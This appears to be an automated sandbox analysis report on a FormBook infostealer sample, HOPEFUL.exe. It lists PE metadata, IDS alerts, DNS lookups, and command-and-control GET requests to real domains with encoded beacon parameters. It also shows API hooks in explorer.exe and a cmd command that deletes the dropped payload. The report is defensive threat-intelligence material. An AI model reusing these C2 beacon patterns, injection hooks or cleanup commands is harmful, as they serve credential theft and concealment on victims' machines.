IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x346484	0x346600	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x34a000	0x632	0x800	False	0.35595703125	data	3.69840070371	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x34c000	0xc	0x200	False	0.041015625	data	0.0940979256627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x34a0a0	0x3a8	data
RT_MANIFEST	0x34a448	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2014 B6:HF663F:=754JC@:4:85B
Assembly Version	1.0.0.0
InternalName	HOPEFUL.exe
FileVersion	8.12.16.20
CompanyName	B6:HF663F:=754JC@:4:85B
Comments	=G5HB;3;JB3AHC8A5B4
ProductName	JFB=@6=@D8H94@H53JCD
ProductVersion	8.12.16.20
FileDescription	JFB=@6=@D8H94@H53JCD
OriginalFilename	HOPEFUL.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/13/21-21:49:23.525067	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.3	35.169.40.107
01/13/21-21:49:23.525067	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.3	35.169.40.107
01/13/21-21:49:23.525067	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.3	35.169.40.107
01/13/21-21:49:44.263031	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49758	34.98.99.30	192.168.2.3
01/13/21-21:50:25.240293	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49760	80	192.168.2.3	34.102.136.180
01/13/21-21:50:25.240293	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49760	80	192.168.2.3	34.102.136.180
01/13/21-21:50:25.240293	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49760	80	192.168.2.3	34.102.136.180
01/13/21-21:50:25.382643	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49760	34.102.136.180	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 21:49:23.396194935 CET	49756	80	192.168.2.3	35.169.40.107
Jan 13, 2021 21:49:23.524663925 CET	80	49756	35.169.40.107	192.168.2.3
Jan 13, 2021 21:49:23.524789095 CET	49756	80	192.168.2.3	35.169.40.107
Jan 13, 2021 21:49:23.525067091 CET	49756	80	192.168.2.3	35.169.40.107
Jan 13, 2021 21:49:23.652430058 CET	80	49756	35.169.40.107	192.168.2.3
Jan 13, 2021 21:49:23.657845974 CET	80	49756	35.169.40.107	192.168.2.3
Jan 13, 2021 21:49:23.657886982 CET	80	49756	35.169.40.107	192.168.2.3
Jan 13, 2021 21:49:23.658147097 CET	49756	80	192.168.2.3	35.169.40.107
Jan 13, 2021 21:49:23.658185959 CET	49756	80	192.168.2.3	35.169.40.107
Jan 13, 2021 21:49:23.785579920 CET	80	49756	35.169.40.107	192.168.2.3
Jan 13, 2021 21:49:44.083266020 CET	49758	80	192.168.2.3	34.98.99.30
Jan 13, 2021 21:49:44.123872042 CET	80	49758	34.98.99.30	192.168.2.3
Jan 13, 2021 21:49:44.123975039 CET	49758	80	192.168.2.3	34.98.99.30
Jan 13, 2021 21:49:44.124205112 CET	49758	80	192.168.2.3	34.98.99.30
Jan 13, 2021 21:49:44.164644003 CET	80	49758	34.98.99.30	192.168.2.3
Jan 13, 2021 21:49:44.263031006 CET	80	49758	34.98.99.30	192.168.2.3
Jan 13, 2021 21:49:44.263072968 CET	80	49758	34.98.99.30	192.168.2.3
Jan 13, 2021 21:49:44.263585091 CET	49758	80	192.168.2.3	34.98.99.30
Jan 13, 2021 21:49:44.263648033 CET	49758	80	192.168.2.3	34.98.99.30
Jan 13, 2021 21:49:44.306463957 CET	80	49758	34.98.99.30	192.168.2.3
Jan 13, 2021 21:50:04.650918961 CET	49759	80	192.168.2.3	174.136.37.109
Jan 13, 2021 21:50:04.807600975 CET	80	49759	174.136.37.109	192.168.2.3
Jan 13, 2021 21:50:04.807812929 CET	49759	80	192.168.2.3	174.136.37.109
Jan 13, 2021 21:50:04.808011055 CET	49759	80	192.168.2.3	174.136.37.109
Jan 13, 2021 21:50:04.976430893 CET	80	49759	174.136.37.109	192.168.2.3
Jan 13, 2021 21:50:04.984437943 CET	80	49759	174.136.37.109	192.168.2.3
Jan 13, 2021 21:50:04.984461069 CET	80	49759	174.136.37.109	192.168.2.3
Jan 13, 2021 21:50:04.985187054 CET	49759	80	192.168.2.3	174.136.37.109
Jan 13, 2021 21:50:04.985217094 CET	49759	80	192.168.2.3	174.136.37.109
Jan 13, 2021 21:50:05.139323950 CET	80	49759	174.136.37.109	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 21:47:33.673636913 CET	60831	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:33.724451065 CET	53	60831	8.8.8.8	192.168.2.3
Jan 13, 2021 21:47:34.610465050 CET	60100	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:34.661415100 CET	53	60100	8.8.8.8	192.168.2.3
Jan 13, 2021 21:47:36.042474031 CET	53195	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:36.099013090 CET	53	53195	8.8.8.8	192.168.2.3
Jan 13, 2021 21:47:37.292948961 CET	50141	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:37.343573093 CET	53	50141	8.8.8.8	192.168.2.3
Jan 13, 2021 21:47:38.442462921 CET	53023	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:38.491338968 CET	53	53023	8.8.8.8	192.168.2.3
Jan 13, 2021 21:47:42.656128883 CET	49563	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:42.712754965 CET	53	49563	8.8.8.8	192.168.2.3
Jan 13, 2021 21:47:44.711277962 CET	51352	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:44.759174109 CET	53	51352	8.8.8.8	192.168.2.3
Jan 13, 2021 21:47:45.872056961 CET	59349	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:45.919939041 CET	53	59349	8.8.8.8	192.168.2.3
Jan 13, 2021 21:47:47.080563068 CET	57084	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:47.128431082 CET	53	57084	8.8.8.8	192.168.2.3
Jan 13, 2021 21:47:48.243196011 CET	58823	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:48.291208982 CET	53	58823	8.8.8.8	192.168.2.3
Jan 13, 2021 21:47:49.395819902 CET	57568	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:49.443736076 CET	53	57568	8.8.8.8	192.168.2.3
Jan 13, 2021 21:47:50.622510910 CET	50540	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:50.673412085 CET	53	50540	8.8.8.8	192.168.2.3
Jan 13, 2021 21:47:52.519221067 CET	54366	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:47:52.567094088 CET	53	54366	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:04.152533054 CET	53034	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:05.169562101 CET	53034	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:05.217772007 CET	53	53034	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:05.671885967 CET	57762	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:05.731378078 CET	53	57762	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:11.419425964 CET	55435	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:11.477761030 CET	53	55435	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:21.501506090 CET	50713	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:21.552089930 CET	53	50713	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:22.449331999 CET	56132	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:22.509794950 CET	53	56132	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:22.664505005 CET	58987	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:22.720869064 CET	53	58987	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:22.818278074 CET	56579	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:22.879911900 CET	53	56579	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:31.238954067 CET	60633	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:31.296679974 CET	53	60633	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:38.495464087 CET	61292	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:38.557069063 CET	53	61292	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:39.186431885 CET	63619	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:39.243732929 CET	53	63619	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:40.269027948 CET	64938	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:40.316947937 CET	53	64938	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:40.813632011 CET	61946	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:40.872780085 CET	53	61946	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:41.623128891 CET	64910	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:41.670948982 CET	53	64910	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:42.367764950 CET	52123	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:42.426841021 CET	53	52123	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:42.755604982 CET	56130	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:42.829658031 CET	53	56130	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:43.036227942 CET	56338	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:43.084266901 CET	53	56338	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:44.424235106 CET	59420	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:44.485919952 CET	53	59420	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:48.240782022 CET	58784	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:48.299400091 CET	53	58784	8.8.8.8	192.168.2.3
Jan 13, 2021 21:48:49.050465107 CET	63978	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:48:49.098325014 CET	53	63978	8.8.8.8	192.168.2.3
Jan 13, 2021 21:49:08.150971889 CET	62938	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:49:08.225167990 CET	53	62938	8.8.8.8	192.168.2.3
Jan 13, 2021 21:49:11.770323992 CET	55708	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:49:11.818288088 CET	53	55708	8.8.8.8	192.168.2.3
Jan 13, 2021 21:49:23.327256918 CET	56803	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:49:23.387768984 CET	53	56803	8.8.8.8	192.168.2.3
Jan 13, 2021 21:49:25.993846893 CET	57145	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:49:26.041655064 CET	53	57145	8.8.8.8	192.168.2.3
Jan 13, 2021 21:49:44.018774033 CET	55359	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:49:44.081831932 CET	53	55359	8.8.8.8	192.168.2.3
Jan 13, 2021 21:50:04.467032909 CET	58306	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:50:04.649347067 CET	53	58306	8.8.8.8	192.168.2.3
Jan 13, 2021 21:50:25.127614975 CET	64124	53	192.168.2.3	8.8.8.8
Jan 13, 2021 21:50:25.198852062 CET	53	64124	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2021 21:49:23.327256918 CET	192.168.2.3	8.8.8.8	0x7fa5	Standard query (0)	www.the343radio.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:49:44.018774033 CET	192.168.2.3	8.8.8.8	0xdfc0	Standard query (0)	www.registeredagentfirm.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:50:04.467032909 CET	192.168.2.3	8.8.8.8	0x718	Standard query (0)	www.tiendazoom.com	A (IP address)	IN (0x0001)
Jan 13, 2021 21:50:25.127614975 CET	192.168.2.3	8.8.8.8	0xad17	Standard query (0)	www.eaglesnestpropheticministry.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 21:49:23.387768984 CET	8.8.8.8	192.168.2.3	0x7fa5	No error (0)	www.the343radio.com		35.169.40.107	A (IP address)	IN (0x0001)
Jan 13, 2021 21:49:23.387768984 CET	8.8.8.8	192.168.2.3	0x7fa5	No error (0)	www.the343radio.com		34.225.31.148	A (IP address)	IN (0x0001)
Jan 13, 2021 21:49:44.081831932 CET	8.8.8.8	192.168.2.3	0xdfc0	No error (0)	www.registeredagentfirm.com	registeredagentfirm.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:49:44.081831932 CET	8.8.8.8	192.168.2.3	0xdfc0	No error (0)	registeredagentfirm.com		34.98.99.30	A (IP address)	IN (0x0001)
Jan 13, 2021 21:50:04.649347067 CET	8.8.8.8	192.168.2.3	0x718	No error (0)	www.tiendazoom.com	tiendazoom.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:50:04.649347067 CET	8.8.8.8	192.168.2.3	0x718	No error (0)	tiendazoom.com		174.136.37.109	A (IP address)	IN (0x0001)
Jan 13, 2021 21:50:25.198852062 CET	8.8.8.8	192.168.2.3	0xad17	No error (0)	www.eaglesnestpropheticministry.com	eaglesnestpropheticministry.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 21:50:25.198852062 CET	8.8.8.8	192.168.2.3	0xad17	No error (0)	eaglesnestpropheticministry.com		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.the343radio.com

www.registeredagentfirm.com

www.tiendazoom.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49756	35.169.40.107	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:49:23.525067091 CET	7329	OUT	GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp HTTP/1.1 Host: www.the343radio.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:49:23.657845974 CET	7330	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 13 Jan 2021 20:49:23 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.the343radio.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49758	34.98.99.30	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:49:44.124205112 CET	7340	OUT	GET /jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP HTTP/1.1 Host: www.registeredagentfirm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:49:44.263031006 CET	7340	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 20:49:44 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc8396-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49759	174.136.37.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:50:04.808011055 CET	7341	OUT	GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p HTTP/1.1 Host: www.tiendazoom.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:50:04.984437943 CET	7342	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Jan 2021 20:50:04 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE0
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE0
GetMessageW	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE0
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: HOPEFUL.exe PID: 6744 Parent PID: 5588

General

Start time:	21:47:39
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\HOPEFUL.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\HOPEFUL.exe'
Imagebase:	0xa40000
File size:	3437056 bytes
MD5 hash:	9C15AF175868121CC014666189D52DAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: AddInProcess32.exe PID: 6548 Parent PID: 6744

General

Start time:	21:48:12
Start date:	13/01/2021
Path:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Imagebase:	0xde0000
File size:	42080 bytes
MD5 hash:	F2A47587431C466535F3C3D3427724BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 6548

General

Start time:	21:48:20
Start date:	13/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmmon32.exe PID: 4656 Parent PID: 3388

General

Start time:	21:48:37
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmmon32.exe
Imagebase:	0x1040000
File size:	36864 bytes
MD5 hash:	2879B30A164B9F7671B5E6B2E9F8DFDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4240 Parent PID: 4656

General

Start time:	21:48:42
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Imagebase:	0xbc0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5192 Parent PID: 4240

General

Start time:	21:48:42
Start date:	13/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: HOPEFUL.exe PID: 6744 Parent PID: 5588 HOPEFUL.exeCOMMON

Executed Functions

Function 0164D6AA, Relevance: 4.7, Strings: 3, Instructions: 978COMMON

Download Yara Rule

Strings

